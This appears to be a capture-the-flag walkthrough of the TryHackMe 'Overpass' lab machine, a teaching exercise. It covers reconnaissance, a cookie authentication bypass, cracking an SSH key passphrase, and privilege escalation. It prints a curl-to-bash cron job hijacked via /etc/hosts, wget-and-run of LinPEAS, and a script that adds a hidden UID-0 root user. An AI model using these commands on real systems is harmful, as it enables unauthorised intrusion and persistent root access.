Overpass Room Walkthrough on TryHackMe: A Comprehensive Guide

In this detailed guide, we will explore the Overpass room on TryHackMe, a platform designed for cybersecurity enthusiasts to hone their skills. This particular room presents a realistic web application challenge that encompasses various vulnerabilities, including weak passwords, exposed credentials, and a classic privilege escalation pathway. By the end of this walkthrough, you will have a thorough understanding of how to navigate the challenges presented in this room.

Machine Overview

Before diving into the steps, let’s take a look at the machine specifications:

• Operating System: Linux
• Difficulty Level: Easy
• Required Skills: Web Enumeration, SSH Access, Privilege Escalation

Step 1: Conducting Initial Reconnaissance with Nmap

The first step in any penetration testing exercise is reconnaissance. We will utilize Nmap, a powerful network scanning tool, to identify open ports and services running on the target machine. Execute the following command:

nmap -p- <target-ip>

This scan will reveal the following open ports:

• Port 22: SSH
• Port 80: HTTP

Upon examining the HTTP server, which is powered by Go, you may notice that it does not exhibit any obvious vulnerabilities at first glance. This observation sets the stage for further exploration.

Step 2: Web Enumeration to Discover Hidden Directories

Next, navigate to the web server on port 80. You will encounter a simple webpage that introduces a project named “Overpass.” To uncover hidden directories, we will perform a directory brute-force scan using Gobuster:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/directory-list-2.3-medium.txt

This scan will lead you to the discovery of the /admin directory, which contains an admin login page.

Finding the Admin Login

Upon inspecting the login page, you may find that standard login attempts are unsuccessful. However, a closer look at the source code reveals two intriguing files: login.js and cookie.js. The cookie.js file contains a vulnerability where the SessionToken cookie is not validated correctly.

To exploit this vulnerability, you can use a browser extension like Cookie Editor to insert a SessionToken with a random value. This action allows you to bypass authentication and gain access to the admin panel. Inside the admin panel, you will find an SSH private key belonging to a user named James.

Step 3: Cracking the SSH Key Passphrase

The SSH key you have obtained is secured with a passphrase. To crack this passphrase, we will use John the Ripper, a popular password cracking tool. First, convert the key into a format that John can process:

ssh2john privatesshkeyfile > overpass.hash

Next, use John to crack the passphrase:

john overpass.hash --wordlist=/usr/share/wordlists/rockyou.txt

After successfully cracking the passphrase, which is “james13,” you can log in via SSH:

ssh -i <privatesshkeyfilename> james@<target-ip>

Once logged in, you will find the first flag located in the user.txt file.

Bonus: Decoding James’s Hidden Password

Within James’s home directory, there exists a hidden file named .overpass. This file contains his SSH password encoded using ROT13. Decoding it reveals the password:

Deciphered Password: saydrawnlyingpicture

Step 4: Privilege Escalation to Root

Now that you have access to the user account, it’s time to escalate your privileges to root. Start by checking for SUID binaries and running the sudo -l command to see what privileges you have. For a more thorough system enumeration, we will utilize LinPEAS, a script designed to assist in privilege escalation.

First, host a Python server on your attacking machine:

python3 -m http.server 8080

Next, download and execute LinPEAS on the target machine:

wget <your-ip>/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

LinPEAS will reveal a cron job that runs every minute:

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

To exploit this cron job, modify the /etc/hosts file to redirect overpass.thm to your attacking machine:

vim /etc/hosts

<yourmachine'sip> overpass.thm

Now, host a malicious buildscript.sh on your Python server:

useradd -ou 0 -g 0 newroot

echo "newroot:password" | chpasswd

Once the cron job executes, it will download and run your script, creating a new root user. You can then log in with this new user and retrieve the root flag from the /root directory.

Conclusion

The Overpass room on TryHackMe provides an excellent opportunity to practice web application security and penetration testing techniques. By following the steps outlined in this walkthrough, you have learned how to conduct reconnaissance, exploit vulnerabilities, crack passwords, and escalate privileges effectively. This experience not only enhances your technical skills but also prepares you for real-world cybersecurity challenges.

Frequently Asked Questions (FAQ)

What is TryHackMe?

TryHackMe is an online platform that offers hands-on cybersecurity training through various challenges and virtual environments.

What skills do I need to complete the Overpass room?

To successfully navigate the Overpass room, you should have a basic understanding of web enumeration, SSH access, and privilege escalation techniques.

How can I improve my penetration testing skills?

Regular practice on platforms like TryHackMe, participating in Capture The Flag (CTF) competitions, and studying cybersecurity concepts can significantly enhance your skills.

What tools are commonly used in penetration testing?

Some popular tools include Nmap for scanning, Gobuster for directory brute-forcing, John the Ripper for password cracking, and LinPEAS for privilege escalation enumeration.

Is the Overpass room suitable for beginners?

Yes, the Overpass room is categorized as easy, making it an ideal starting point for those new to penetration testing.